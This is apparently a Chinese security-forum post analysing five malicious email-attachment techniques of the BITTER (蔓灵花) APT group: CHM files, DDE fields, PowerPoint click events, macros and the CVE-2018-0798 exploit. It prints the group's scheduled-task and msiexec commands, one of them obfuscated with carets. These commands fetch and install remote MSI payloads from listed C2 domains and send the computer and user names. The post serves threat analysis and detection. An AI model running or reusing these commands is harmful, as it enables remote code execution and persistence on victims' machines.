APT组织“蔓灵花”恶意邮件附件5种手法分析
qianlan 发表于 新加坡 WEB安全 1721浏览 · 2024-02-22 10:18

前言

最近有遇到同源样本,所以整合了一下近期”蔓灵花“组织钓鱼邮件中恶意附件执行的常见手法,包括:

  • 恶意“.chm”文件投放
  • 恶意"DDE"隐藏域代码执行
  • “.ppt”文件PowerPoint单击鼠标事件
  • 恶意宏文档
  • 公式编辑器漏洞利用

这篇文章会让你对上述的5类手法有个基本认识。后续会记录23年5月首次曝光的“蔓灵花”恶意邮件附件配套的后续载荷,白加黑”ORPCBackdoor“后门。(在此之前后续载荷常见为”wmRAT“远控)。

背景

蔓灵花组织,又称为BITTER、APT-C-08、苦象、T-APT-17,是一支据称有南亚背景的高级持久性威胁(APT)组织。自2013年11月起,该组织开始活跃,并主要专注于巴基斯坦和中国两国。其攻击目标主要包括政府部门、电力行业、军工业相关单位,其意图是窃取敏感资料。

恶意附件手法分析

例举的五种已知的“蔓灵花”组织钓鱼手法,最终目的大都是创建计划任务定时15到25分钟请求一次C2远程加载(msiexec)恶意“.msi”文件。在请求时会带上计算机名和用户名,上线后C2后台会用计算机名和用户名创建一个空白的文件夹。攻击者会在诸多文件夹中挑选感兴趣的目标放入“.msi”文件,选中目标下次计划任务成功执行就会完成恶意的远程加载。

所以想去获取后续载荷直接访问多数时候是空的。

(一)“.chm”文件投放

大概从2021年初起,“蔓灵花”组织使用“.chm”恶意文件投递的手法就很常见,这些年又猛猛吃老本。下图是一个受控的“.gov”邮箱账号,散播携带“.chm”恶意文件压缩包附件的邮件。

查看其包含的恶意代码如下,主要是功能是创建一个恶意的计划任务。

每隔17分钟远程加载(msiexec)一次恶意资源,并且上传主机名和用户名,计划任务如下图。

请求url地址

http://comnmsgwrapsvc.net/ver/verif.php/?h=%computername%*%username% 
http://folkmusicstreams.com/TIME/mac.php?sit=%computername%*%username%

抓取数据包如下图

msiexec命令远程加载是值得注意的事情。msiexec是Windows操作系统下的命令行工具,用于安装、修复、卸载Windows Installer软件包。它支持加载远程资源安装,运行时,将msi文件从远程位置下载到本地的临时目录中,并在本地落地进行安装。安装完成或发生错误,临时的msi文件将从磁盘上删除。

所以在取证时,在受检PC或服务器是找不到msi包的。但是该方法在流量分析的角度是很容易被检测,使用msiexec做远程http资源加载,http头“User-Agent”字段固定为“Windows Installer”(如上图),如果你编写检测规则,一律判定恶意,就可以检测此类的远程加载恶意行为。

(二)恶意"DDE"隐藏域代码执行

攻击者投递带有恶意DDE auto的文档。”.docx“文档打开时一片空白(也可能有其他正常的一些迷惑文字或图片信息),在选项中找到->视图->显示文档内容->域代码。

打开之后长这样,实际上是十进制数。

对应转ascll文本,同样是计划任务远程加载恶意msi文件。

"cmd /c msiexec.exe /i http://nesiallservice.net/chq/stall.msi /q"

值得一提的是APT-Q-42腾云蛇组织用过类似的手法,南亚组织手法错综复杂,好几个组织搞不好就是一伙人。

(三)“.ppt”文件PowerPoint单击鼠标事件

攻击者下发恶意”.PPT“文件。在图片上设置了鼠标单击事件,同样是创建计划任务远程加载恶意msi资源。

cmd.exe <p style=color:white> /c schtasks /create /sc minute /mo 15 /tn AudioDg /f /tr  "%coMSPec% /c start /min msiexec /i  http://farleysmxpph.com/FOXX/far.php?ptu=%computername%*%username% /qn /norestart"& echo"</p><h3>继续</h3><p style=color:white>

(四)文档宏病毒

攻击者下发携带恶意宏的文件。宏文档投递数相对较少见,毕竟初次要提示用户启用与否,可能总体成功率不高。启用宏之后在开发工具-->VB编辑器中查看。

可能存在密码校验,使用工具VBA_Password_Bypasser即可解密,注意这玩意儿要激活才能使用,有教程可以找到。后续就可以分析其中的恶意代码功能了。

(五)CVE-2018-0798公式编辑器漏洞

攻击者下发携带漏洞的”.xlsx"文件,在诸多公式编辑器漏洞里,CVE-2018-0798算是利用成功率比较高的。这受影响的版本软件和样本还有点难找。

这是进程释放的详情,也是一样的创建计划任务远程恶意加载。

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 15 /TN \Windows\DWM\DWMCORE /TR "cmd /c start /min ms^iex^ec /i htt^p^:^//alf^ieh^eal^thc^ares^erv^ice^.^com/AL/al.php/?dt=%computername% /q" /f

0 条评论
某人
表情
可输入 255